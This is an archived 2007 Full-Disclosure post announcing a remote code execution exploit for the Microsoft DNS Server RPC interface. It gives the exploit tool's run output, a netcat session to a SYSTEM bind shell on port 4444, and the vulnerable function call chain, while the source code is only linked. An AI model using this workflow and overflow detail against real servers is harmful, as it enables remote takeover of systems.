Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:16708
HistoryApr 16, 2007 - 12:00 a.m.

[Full-disclosure] Microsoft DNS Server Remote Code execution Exploit and analysis

2007-04-1600:00:00
vulners.com
26
JSON

Hi,

im sending you the headers of the new exploit code for microsoft DNS
servers. You can download the full source code exploit and analysis at:

Microsoft DNS Server Remote Code execution Exploit and analysis
Advisory: http://www.microsoft.com/technet/security/advisory/935964.mspx
This remote exploit works against port 445 (also Microsoft RPC api used)

Author:

Timeline:

  • April,12,2007: Microsoft advisory published
  • April,13,2007: POC Exploit coded
  • April,14,2007: Microsoft notified about a new attack vector against port
    445 (this exploit code)
  • April,14,2007: Working exploit for Windows 2000 server SP4 (Spanish)
  • April,15,2007: Working exploit for Windows 2003 server SP2 (Spanish) /GS
    bypassed
  • April,16,2007: hackers hax the w0rld and got busted.
  • April,xx,2007: Lammer release the first buggy worm
  • Xxxxx,xx,2007: Finally it was true. Nacked photos of Gary m… being
    abducted were found at NSA servers

Usage:
D:\DNSTEST>dnstest.exe 192.168.1.7
-------------------------------------------------------
Microsoft Dns Server local & remote RPC Exploit code (port 445)
Exploit code by Andres Tarasco & Mario Ballano
Tested against Windows 2000 server SP4 and Windows 2003 SP2 (Spanish)
-------------------------------------------------------

[+] Trying to fingerprint target… 05 02
[+] Remote Host identified as Windows 2003
[+] Connecting to 50abc2a4-574d-40b3-9d66-ee4fd5fba076@ncacn_np:
192.168.1.7[\\pipe\\dnsserver]
[+] RpcBindingFromStringBinding returned 0x0
[+] Calling remote procedure DnssrvOperation()
[+] Now try to connect to port 4444

D:\DNSTEST>nc 192.168.1.7 4444
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.

C:\WINDOWS\system32>whoami
nt authority\system

Vulnerability Analysis:

The function Lookup_ZoneTreeNodeFromDottedName() uses a fixed local buffer
to convert
a string calling Name_ConvertFileNameToCountName(), this string can
contain back-slash
octal characters. Although some bounds checks are done when writting to
the buffer is
still possible to bypass them using a string with multiple backslashed
chars, resulting
in a stack based buffer overflow.

This function can be reached through DNS RPC Interface, the execution flow

will be as follows:

R_DnssrvQuery(pa,buggybuffer,pc,DesiredAccess,pd); // RPC
Exported function
R_DnssrvQuery2(0,0,pa,buggybuffer,pc,DesiredAccess,pd);
RpcUtil_FindZone(buggybuffer,1,DesiredAccess);
Zone_FindZoneByName(buggybuffer); //
Here we go!
Lookup_ZoneTreeNodeFromDottedName(buggybuffer,0,0x2000000);
Name_ConvertFileNameToCountName(localbuffer,buggybuffer,0); //
Using fixed size local buffer
extractQuotedChar(x,x,buggybuffer); //
Extract octal number
Disassemblies at the end of the code:

References:

  • Defeating the Stack Based Buffer Overflow Prevention Mechanism of
    Microsoft Windows 2003 Server. (David Litchfield, NGSSoftware).
  • www.48bits.com
  • http://www.514.es

Just compile the code with nmake and have fun!

*/

JSON